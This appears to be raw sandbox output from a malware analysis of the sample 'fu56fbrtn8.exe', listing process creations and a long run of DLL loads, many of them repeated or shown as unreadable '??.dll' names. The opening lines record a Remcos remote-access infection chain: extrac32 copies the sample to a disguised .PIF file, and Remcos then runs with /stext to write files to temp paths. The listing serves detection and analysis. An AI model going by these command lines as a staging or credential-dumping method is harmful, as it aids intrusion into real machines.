                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\Windows\SysWOW64\extrac32.exe C:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\user\Desktop\fu56fbrtn8.exe C:\\Users\\Public\\Libraries\\Cmzcxhwn.PIFJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeProcess created: C:\ProgramData\Remcos\remcos.exe "C:\ProgramData\Remcos\remcos.exe" Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\kcrrhbu"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\uxwkztfesgm"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\fzkcamqygoemct"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\cidefd"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\mkqxyvffd"Jump to behavior
                      Source: C:\ProgramData\Remcos\remcos.exeProcess created: C:\ProgramData\Remcos\remcos.exe C:\ProgramData\Remcos\remcos.exe /stext "C:\Users\user\AppData\Local\Temp\wevpzoqgrjkc"Jump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: version.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: archiveint.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: url.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ieframe.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: wkscli.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: endpointdlp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: eamsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: smartscreenps.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: winmm.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: am.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???y.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ????.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???2.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ???.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??????s.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
                      Source: C:\Users\user\Desktop\fu56fbrtn8.exeSection loaded: ??.dllJump to behavior
